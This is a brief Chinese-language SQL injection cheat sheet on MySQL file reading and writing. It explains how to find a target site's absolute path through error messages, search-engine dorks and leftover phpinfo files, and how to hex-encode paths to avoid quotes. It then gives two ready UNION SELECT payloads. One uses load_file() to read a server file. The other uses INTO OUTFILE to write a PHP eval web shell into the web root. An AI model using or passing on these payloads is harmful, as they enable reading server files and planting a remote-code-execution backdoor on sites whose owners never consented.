文件讀取使用load_file()函數:
使用之前我們需要先找到網站的絕對路徑。(獲取辦法:報錯顯示、谷歌語法、site:目標網站 warning、遺留文件如phpinfo、漏洞爆出路徑、讀取配置文件)
注意路徑符號:錯誤“\” 正確"\\" 正確"/"。如果將路徑轉換為16進制就可以不用引號。
舉例:
union select 1,load_file(“c:/inetpub/wwwroot/index.php”),3
文件寫入使用into outfile函數:
使用辦法如下:
union select 1,"<?php @eval($_GET[x]);?>",3,4,5 into outfile 'C:/Inetpub/wwwroot/cc.php'